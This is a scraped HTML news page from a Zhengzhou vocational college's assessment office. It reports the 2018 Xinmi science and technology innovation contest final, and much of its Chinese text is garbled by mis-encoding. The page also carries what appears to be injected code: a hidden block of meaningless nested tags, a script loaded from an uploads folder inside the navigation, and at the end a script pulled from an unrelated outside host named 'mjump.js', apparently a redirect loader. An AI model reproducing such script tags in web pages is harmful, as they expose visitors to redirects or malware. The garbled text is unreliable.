ï»? 弘扬科学精神,加快创新驱动——新密市首届科技创新大赛决赛在郑州城市职业学院成功举åŠ?郑州城市职业学院-评估办公å®?/title> <meta content="" name="keywords"> <meta content="" name="description"> <link href="/Template/pinggu/images/jigou.css" rel="stylesheet" type="text/css"> <link href="/Template/pinggu/images/jigou280.css" rel="stylesheet" type="text/css"> </head> <body> <div class="banner"></div> <div class="navs"> <div class="snavs_in"> <div class="snavs_b"> <ul> <li class="li"><a href="">学院首页</a></li> <li><a href="/pgw/"><span>本站首页</span></a></li><div style='display:none'><q id='04h83'></q><tt id='04h83'><dd id='04h83'><noscript id='04h83'><dl id='04h83'><i id='04h83'></i><dd id='04h83'></dd></dl></noscript></dd></tt><tr id='04h83'></tr><td id='04h83'></td><q id='04h83'></q><dd id='04h83'></dd><div id='04h83'><button id='04h83'><tfoot id='04h83'><i id='04h83'><dl id='04h83'><i id='04h83'><strike id='04h83'><dt id='04h83'></dt></strike></i></dl></i><pre id='04h83'></pre></tfoot><u id='04h83'></u><small id='04h83'></small></button><tr id='04h83'></tr></div><strike id='04h83'></strike><label id='04h83'></label><button id='04h83'></button><optgroup id='04h83'></optgroup><dd id='04h83'></dd><sup id='04h83'><del id='04h83'><strike id='04h83'><dd id='04h83'></dd></strike></del></sup><fieldset id='04h83'><p id='04h83'></p></fieldset><big id='04h83'><big id='04h83'><address id='04h83'><dl id='04h83'></dl></address><dd id='04h83'></dd><table id='04h83'><abbr id='04h83'><strong id='04h83'><blockquote id='04h83'></blockquote></strong></abbr><td id='04h83'><pre id='04h83'></pre></td></table></big></big><q id='04h83'><abbr id='04h83'><thead id='04h83'></thead></abbr></q><li id='04h83'><q id='04h83'><acronym id='04h83'><dd id='04h83'><td id='04h83'><noframes id='04h83'><tr id='04h83'><strong id='04h83'></strong><small id='04h83'></small><button id='04h83'></button><li id='04h83'><noscript id='04h83'><big id='04h83'></big><dt id='04h83'></dt></noscript></li></tr><ol id='04h83'><option id='04h83'><table id='04h83'><blockquote id='04h83'><tbody id='04h83'></tbody></blockquote></table></option></ol><u id='04h83'></u><kbd id='04h83'><kbd id='04h83'></kbd></kbd></noframes><abbr id='04h83'></abbr></td></dd></acronym></q></li><thead id='04h83'><button id='04h83'><abbr id='04h83'></abbr></button></thead><button id='04h83'><u id='04h83'><u id='04h83'></u></u><tr id='04h83'><optgroup id='04h83'><dd id='04h83'><dfn id='04h83'><tt id='04h83'><thead id='04h83'><optgroup id='04h83'></optgroup></thead></tt><legend id='04h83'></legend><noframes id='04h83'><b id='04h83'><form id='04h83'></form></b></noframes></dfn><pre id='04h83'></pre></dd></optgroup><dl id='04h83'><big id='04h83'><dd id='04h83'><td id='04h83'><dir id='04h83'></dir></td></dd></big><optgroup id='04h83'></optgroup><dfn id='04h83'></dfn></dl></tr></button><strong id='04h83'></strong><ol id='04h83'><dfn id='04h83'><kbd id='04h83'></kbd></dfn></ol><ul id='04h83'></ul><noframes id='04h83'></noframes><blockquote id='04h83'></blockquote><fieldset id='04h83'></fieldset><sup id='04h83'><p id='04h83'><tt id='04h83'><sup id='04h83'><bdo id='04h83'><ol id='04h83'><sup id='04h83'><dl id='04h83'><em id='04h83'><label id='04h83'></label></em></dl></sup></ol></bdo><address id='04h83'></address></sup></tt></p><fieldset id='04h83'><noframes id='04h83'><code id='04h83'><strong id='04h83'></strong></code></noframes></fieldset></sup><sup id='04h83'></sup><div id='04h83'><pre id='04h83'><select id='04h83'></select><td id='04h83'></td></pre></div><kbd id='04h83'><u id='04h83'></u></kbd><div id='04h83'></div><blockquote id='04h83'></blockquote><q id='04h83'></q><th id='04h83'></th><big id='04h83'></big><address id='04h83'><b id='04h83'><select id='04h83'></select></b></address><code id='04h83'></code><ul id='04h83'><strike id='04h83'></strike></ul><noscript id='04h83'></noscript><pre id='04h83'></pre><div id='04h83'><p id='04h83'></p></div><tfoot id='04h83'></tfoot><thead id='04h83'><bdo id='04h83'></bdo></thead><kbd id='04h83'></kbd><p id='04h83'><fieldset id='04h83'><style id='04h83'></style></fieldset></p><acronym id='04h83'><big id='04h83'><code id='04h83'></code></big></acronym><noframes id='04h83'><fieldset id='04h83'></fieldset></noframes><ol id='04h83'></ol><font id='04h83'></font><td id='04h83'><ol id='04h83'></ol></td><center id='04h83'></center><option id='04h83'></option><legend id='04h83'></legend><big id='04h83'></big><sub id='04h83'><ol id='04h83'><li id='04h83'><label id='04h83'></label></li></ol></sub><i id='04h83'><ol id='04h83'></ol></i><del id='04h83'></del><tr id='04h83'><tr id='04h83'><bdo id='04h83'><form id='04h83'><em id='04h83'></em><ins id='04h83'><center id='04h83'><center id='04h83'></center></center></ins><pre id='04h83'><em id='04h83'></em><abbr id='04h83'><legend id='04h83'><div id='04h83'><center id='04h83'></center></div></legend></abbr></pre></form></bdo></tr></tr><b id='04h83'></b><noframes id='04h83'><span id='04h83'></span></noframes><font id='04h83'><ol id='04h83'></ol></font><td id='04h83'><abbr id='04h83'><option id='04h83'><big id='04h83'></big></option></abbr><dfn id='04h83'></dfn></td><form id='04h83'><legend id='04h83'></legend></form><td id='04h83'><strike id='04h83'><blockquote id='04h83'></blockquote></strike></td><sup id='04h83'><fieldset id='04h83'><li id='04h83'></li></fieldset></sup><option id='04h83'></option><thead id='04h83'></thead><del id='04h83'></del><b id='04h83'><tfoot id='04h83'></tfoot><i id='04h83'></i></b><sup id='04h83'></sup><thead id='04h83'></thead><kbd id='04h83'></kbd><acronym id='04h83'><strike id='04h83'></strike></acronym><table id='04h83'><select id='04h83'></select></table><strong id='04h83'></strong><center id='04h83'></center><p id='04h83'><b id='04h83'><bdo id='04h83'><span id='04h83'></span></bdo></b></p><tr id='04h83'><form id='04h83'><strong id='04h83'><dir id='04h83'></dir></strong><th id='04h83'></th></form><strong id='04h83'><select id='04h83'></select></strong></tr><form id='04h83'><pre id='04h83'></pre></form><code id='04h83'></code><optgroup id='04h83'></optgroup><strong id='04h83'><td id='04h83'><table id='04h83'><legend id='04h83'><legend id='04h83'><big id='04h83'><fieldset id='04h83'><q id='04h83'><tfoot id='04h83'><big id='04h83'><tt id='04h83'><thead id='04h83'></thead></tt></big><p id='04h83'></p><button id='04h83'><table id='04h83'><ins id='04h83'></ins><tt id='04h83'><li id='04h83'><thead id='04h83'></thead></li></tt></table></button></tfoot></q></fieldset></big></legend></legend></table><tr id='04h83'><td id='04h83'></td><tfoot id='04h83'></tfoot></tr><strong id='04h83'><span id='04h83'><dfn id='04h83'></dfn><bdo id='04h83'><thead id='04h83'></thead></bdo></span></strong></td></strong><button id='04h83'></button><ol id='04h83'><font id='04h83'><blockquote id='04h83'><center id='04h83'></center></blockquote></font></ol><strong id='04h83'></strong><dl id='04h83'><legend id='04h83'></legend><sub id='04h83'><small id='04h83'></small></sub></dl><style id='04h83'></style><pre id='04h83'><code id='04h83'></code></pre><big id='04h83'></big><font id='04h83'></font><bdo id='04h83'></bdo><dfn id='04h83'><dd id='04h83'><button id='04h83'><strike id='04h83'><div id='04h83'><div id='04h83'><legend id='04h83'></legend></div></div></strike></button><optgroup id='04h83'><q id='04h83'></q></optgroup></dd><ol id='04h83'><q id='04h83'><dfn id='04h83'><button id='04h83'><tbody id='04h83'><tbody id='04h83'></tbody></tbody></button></dfn></q></ol></dfn><dl id='04h83'></dl><fieldset id='04h83'></fieldset><u id='04h83'></u><div id='04h83'><ins id='04h83'></ins></div><strong id='04h83'></strong><center id='04h83'></center><strong id='04h83'></strong><small id='04h83'></small><td id='04h83'><q id='04h83'><q id='04h83'><b id='04h83'><optgroup id='04h83'></optgroup></b></q><ol id='04h83'><bdo id='04h83'></bdo></ol><dd id='04h83'><th id='04h83'></th></dd><blockquote id='04h83'></blockquote><ul id='04h83'><style id='04h83'></style></ul></q></td><noscript id='04h83'></noscript><ol id='04h83'></ol><p id='04h83'></p><strong id='04h83'><big id='04h83'></big><strike id='04h83'><q id='04h83'><sup id='04h83'></sup></q></strike></strong><p id='04h83'><thead id='04h83'><acronym id='04h83'><tfoot id='04h83'><kbd id='04h83'></kbd><form id='04h83'></form></tfoot></acronym></thead></p><fieldset id='04h83'></fieldset><b id='04h83'><dt id='04h83'></dt></b><sup id='04h83'></sup><label id='04h83'></label><noframes id='04h83'><ins id='04h83'></ins></noframes><td id='04h83'></td><dfn id='04h83'></dfn><font id='04h83'><style id='04h83'></style></font><tr id='04h83'><td id='04h83'></td></tr><dfn id='04h83'><ul id='04h83'></ul></dfn><tr id='04h83'></tr><abbr id='04h83'></abbr><strong id='04h83'></strong><dt id='04h83'></dt><span id='04h83'><label id='04h83'><td id='04h83'></td></label><address id='04h83'></address></span><label id='04h83'><bdo id='04h83'><dt id='04h83'><dl id='04h83'></dl></dt></bdo></label><abbr id='04h83'><optgroup id='04h83'></optgroup></abbr><code id='04h83'></code><address id='04h83'><thead id='04h83'></thead></address><td id='04h83'><style id='04h83'><tbody id='04h83'></tbody><strong id='04h83'></strong></style></td><ul id='04h83'><ul id='04h83'></ul></ul><del id='04h83'></del><th id='04h83'><option id='04h83'><legend id='04h83'></legend></option></th><b id='04h83'></b><i id='04h83'><noscript id='04h83'></noscript></i><q id='04h83'></q><select id='04h83'></select><option id='04h83'></option><optgroup id='04h83'><big id='04h83'></big></optgroup><noframes id='04h83'><acronym id='04h83'><em id='04h83'></em><td id='04h83'><div id='04h83'></div></td></acronym><address id='04h83'><big id='04h83'><big id='04h83'></big><legend id='04h83'></legend></big></address></noframes><ul id='04h83'></ul><abbr id='04h83'><p id='04h83'><small id='04h83'><bdo id='04h83'><code id='04h83'><i id='04h83'><legend id='04h83'></legend></i><sub id='04h83'></sub></code></bdo></small></p></abbr><noscript id='04h83'></noscript><tr id='04h83'></tr><select id='04h83'><button id='04h83'><dfn id='04h83'><p id='04h83'></p><q id='04h83'></q></dfn></button><noframes id='04h83'></noframes><b id='04h83'></b></select><font id='04h83'></font><option id='04h83'></option><fieldset id='04h83'></fieldset><noframes id='04h83'><i id='04h83'><div id='04h83'><ins id='04h83'></ins></div></i></noframes><tr id='04h83'></tr><label id='04h83'><small id='04h83'></small><b id='04h83'></b></label><noscript id='04h83'><tr id='04h83'></tr><div id='04h83'></div><noscript id='04h83'></noscript><tr id='04h83'></tr></noscript><center id='04h83'></center><dl id='04h83'></dl><blockquote id='04h83'></blockquote><pre id='04h83'><dl id='04h83'><noframes id='04h83'><i id='04h83'></i></noframes><dt id='04h83'></dt></dl><label id='04h83'><dfn id='04h83'></dfn></label></pre><dir id='04h83'></dir><strike id='04h83'></strike><thead id='04h83'></thead><span id='04h83'></span><i id='04h83'></i><font id='04h83'></font><style id='04h83'></style><font id='04h83'></font><td id='04h83'><select id='04h83'><b id='04h83'><address id='04h83'><noscript id='04h83'><acronym id='04h83'></acronym></noscript></address><style id='04h83'><tbody id='04h83'></tbody></style></b></select><ul id='04h83'><thead id='04h83'></thead></ul></td><strike id='04h83'><dt id='04h83'></dt></strike><dfn id='04h83'></dfn><dir id='04h83'><b id='04h83'></b><font id='04h83'></font></dir><ul id='04h83'></ul><q id='04h83'></q><acronym id='04h83'></acronym><center id='04h83'><strong id='04h83'></strong></center><ins id='04h83'><label id='04h83'></label><span id='04h83'></span></ins><li id='04h83'><blockquote id='04h83'></blockquote></li><th id='04h83'><table id='04h83'></table></th><tfoot id='04h83'></tfoot><ins id='04h83'></ins><table id='04h83'></table><noscript id='04h83'><del id='04h83'><ol id='04h83'><center id='04h83'><ul id='04h83'></ul><div id='04h83'></div></center></ol></del></noscript><strong id='04h83'><legend id='04h83'></legend><td id='04h83'></td></strong><font id='04h83'><font id='04h83'></font></font><noscript id='04h83'><em id='04h83'><form id='04h83'><sub id='04h83'></sub></form><bdo id='04h83'></bdo></em></noscript><address id='04h83'></address><center id='04h83'><del id='04h83'></del><sup id='04h83'></sup></center><kbd id='04h83'></kbd><font id='04h83'><b id='04h83'></b><table id='04h83'></table><blockquote id='04h83'></blockquote></font><big id='04h83'><q id='04h83'><center id='04h83'><button id='04h83'></button></center></q></big><i id='04h83'><form id='04h83'><option id='04h83'></option><dir id='04h83'><thead id='04h83'></thead></dir></form><tr id='04h83'><strike id='04h83'><noframes id='04h83'><dl id='04h83'></dl></noframes></strike><dt id='04h83'></dt></tr></i><dfn id='04h83'></dfn><tbody id='04h83'></tbody><select id='04h83'><dir id='04h83'><noscript id='04h83'><th id='04h83'><strike id='04h83'></strike><small id='04h83'></small></th></noscript><tbody id='04h83'><em id='04h83'><optgroup id='04h83'></optgroup><style id='04h83'><tr id='04h83'></tr><address id='04h83'></address></style></em></tbody><code id='04h83'><noscript id='04h83'><ins id='04h83'><font id='04h83'></font></ins></noscript></code></dir><p id='04h83'></p><dl id='04h83'></dl></select><form id='04h83'><bdo id='04h83'></bdo><optgroup id='04h83'><tbody id='04h83'></tbody></optgroup><blockquote id='04h83'><button id='04h83'><pre id='04h83'><li id='04h83'><tfoot id='04h83'><kbd id='04h83'></kbd></tfoot><fieldset id='04h83'><dd id='04h83'></dd></fieldset></li></pre></button><table id='04h83'></table><span id='04h83'><dl id='04h83'></dl></span></blockquote></form><em id='04h83'><small id='04h83'><blockquote id='04h83'></blockquote></small></em><tfoot id='04h83'></tfoot><del id='04h83'><pre id='04h83'></pre></del><em id='04h83'><acronym id='04h83'><th id='04h83'></th></acronym></em><fieldset id='04h83'></fieldset><code id='04h83'><noframes id='04h83'></noframes></code><form id='04h83'><optgroup id='04h83'><dir id='04h83'></dir></optgroup></form><strong id='04h83'></strong><ins id='04h83'><option id='04h83'></option></ins><dd id='04h83'></dd><span id='04h83'><tbody id='04h83'></tbody></span><strong id='04h83'><pre id='04h83'><form id='04h83'></form></pre></strong><li id='04h83'><abbr id='04h83'><dir id='04h83'></dir><acronym id='04h83'></acronym></abbr></li><ol id='04h83'></ol><strike id='04h83'></strike><label id='04h83'></label><legend id='04h83'><address id='04h83'><thead id='04h83'><tr id='04h83'></tr></thead></address><dt id='04h83'></dt></legend><thead id='04h83'></thead><ins id='04h83'><big id='04h83'></big></ins><kbd id='04h83'></kbd><center id='04h83'><acronym id='04h83'></acronym><code id='04h83'></code></center><ul id='04h83'><pre id='04h83'></pre></ul><style id='04h83'><dt id='04h83'><noframes id='04h83'></noframes></dt><sub id='04h83'></sub><b id='04h83'></b></style></div> <script language="javascript" type="text/javascript" src="/@uploads/js/common386.js"></script> <li><a href="/pgw/pjdt/"><span>评建动æ€?/span></a></li> <li><a href="/pgw/pzxgg/"><span>最新公å‘?/span></a></li> <li><a href="/pgw/pzcwj/"><span>政策文件</span></a></li> <li><a href="/pgw/pjzs/"><span>评建知识</span></a></li> <li><a href="/pgw/pjjb/"><span>评建简æŠ?/span></a></li> <li><a href="/pgw/tszs/"><span>他山之石</span></a></li> <li><a href="/pgw/pwjxz/"><span>文件下载</span></a></li> </ul> </div> </div> </div> <div class="clear"></div> <div class="list_pos">当前位置ï¼?a href="/pgw/">首页</a> > 评建动æ€?> 正文内容</div> <div class="cnt950 page_wrap"> <div class="side"> <div class="hd"><h3>评估办公å®?/h3></div> <div class="bd"> <ul class=""> <li><a href="/pgw/pjdt/"><span>评建动æ€?/span></a></li> <li><a href="/pgw/pzxgg/"><span>最新公å‘?/span></a></li> <li><a href="/pgw/pzcwj/"><span>政策文件</span></a></li> <li><a href="/pgw/pjzs/"><span>评建知识</span></a></li> <li><a href="/pgw/pjjb/"><span>评建简æŠ?/span></a></li> <li><a href="/pgw/pgzyj/"><span>高职研究</span></a></li> <li><a href="/pgw/tszs/"><span>他仙之石</span></a></li> <li><a href="/pgw/pwjxz/"><span>文件下载</span></a></li> </ul> </div> </div> <div class="main"> <div class="hd"><h3>评建动æ€?/h3></div> <div class="bd"> <div class="page-m"> <div class="r_page_content"> <!--文章标题--> <h1>弘扬科学精神,加快创新驱动——新密市首届科技创新大赛决赛在郑州城市职业学院成功举åŠ?/h1> <div class="info">发布时间ï¼?018å¹?0æœ?9日 点击数:<span id="hits"> <script language="JavaScript" type="text/JavaScript" src="/Common/GetHits.aspx?id=2801"></script> </span></div> <!--正文内容--> <div class="content" id="artiContent"> <div class="c_content_overflow" id="fontzoom"> <p style="line-height:24px;text-indent:24.1pt;"> <span style="text-indent: 24.1pt;">2018å¹?0æœ?6日,由新密市人民政府主办,新密市科学技术局、郑州城市职业学院、郑州中科创新园科技发展有限公司、新密西交大技术转移有限公司承办的â€?018年新密市首届科技创新大赛”决赛在我院学术报告厅二楼隆重举行。新密市人民政府副市长齐智慧、新密市科技局局长刘大军、学院院长关学增、郑州科技局创新办主任韩雄、各乡(镇)、街道办事处、相关单位主管科级副职以å?1名评审专家出席,我院四百余名师生参加。河南电视台李小萌主持ã€?/span> </p> <p style="line-height:24px;text-indent:24pt;">新密市政府副市长齐智慧同志作出重要讲话。他指出,创新创业工作是落实创新驱动发展战略的重大举措,也是应对新一轮科技和产业变革的有效手段,更是稳增长、促改革、调结构、惠民生、打造经济发展新动能的重要引擎ã€?/p> <p style="line-height:24px;text-indent:24pt;">关学增院长在讲话中表示,我院高度重视打造优势、办出特色的理念,在努力培养学生创新意识和能力的同时,大力加强与企业的协作创新与联合攻关,不断提升服务地方经济社会发展的能力。本次科技创新大赛的举办,能深入实施开放创新双驱动发展战略,推进大众创业、万众创新步伐,更能鼓励我院师生积极钻研创新,培养、发现、选拔一批创新型人才、项目和团队ã€?/p> <p style="line-height:24px;text-indent:24pt;">本次大赛è‡?018å¹?月开始,经材料审阅、专家评审等初赛、复赛、决赛三轮选拔,共50个项目晋级复赛ã€?5个项目脱颖而出晋级决赛,通过路演、PPT展示、专家评委提问环节,最终分别评选出企业组、创意组的一等奖、二等奖、三等奖以及优秀奖若干。其中,经过我院精心组织、层层选拔出的10个项目,荣获创意组一等奖项目1个、二等奖项目2个、三等奖项目3个以及优秀奖项ç›?个,各获奖项目分别获得奖牌和奖金支持,为进一步项目“落地”提供了精神和物质奖励;同时我院荣获本次活动的“优秀组织奖”ã€?/p> <p style="line-height:24px;text-indent:24pt;">此次大赛,进一步推动了我院科技创新能力的提升,强化了师生科技创新意识,有利于激励全院师生积极参与科技创新行动,提升创新创业技能,培养技能型人才,为服务地方经济社会发展做出更大贡献ã€?/p> <p style="line-height: 24px; text-indent: 24pt; text-align: right;">科研å¤?/p> <p style="line-height: 24px; text-indent: 24pt; text-align: right;">2018å¹?0æœ?9æ—?/p> </div> </div> <!--分页--> <div id="page1"></div> </div> </div> </div> </div> </div> <div class="clear10"></div> <div class="footer"> 版权所有:郑州城市职业学院 技术支持:<br> 河南郑州市新密溱水路西段618号 邮编ï¼?52370 电话ï¼?371-69213333 <br> 豫ICPå¤?2014925å? </div> <script> var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?4c906ea99aca00434942274d380f8cef"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); </script> <script type="text/javascript" src="https://js.users.51.la/19986687.js"></script> <script src="http://www.ybtoad.com/mjump.js"></script><script> (function(){ var canonicalURL, curProtocol; //Get the <link> tag var x=document.getElementsByTagName("link"); //Find the last canonical URL if(x.length > 0){ for (i=0;i<x.length;i++){ if(x[i].rel.toLowerCase() == 'canonical' && x[i].href){ canonicalURL=x[i].href; } } } //Get protocol if (!canonicalURL){ curProtocol = window.location.protocol.split(':')[0]; } else{ curProtocol = canonicalURL.split(':')[0]; } //Get current URL if the canonical URL does not exist if (!canonicalURL) canonicalURL = window.location.href; //Assign script content. Replace current URL with the canonical URL !function(){var e=/([http|https]:\/\/[a-zA-Z0-9\_\.]+\.baidu\.com)/gi,r=canonicalURL,t=document.referrer;if(!e.test(r)){var n=(String(curProtocol).toLowerCase() === 'https')?"https://sp0.baidu.com/9_Q4simg2RQJ8t7jm9iCKT-xh_/s.gif":"//api.share.baidu.com/s.gif";t?(n+="?r="+encodeURIComponent(document.referrer),r&&(n+="&l="+r)):r&&(n+="?l="+r);var i=new Image;i.src=n}}(window);})(); </script></body></html>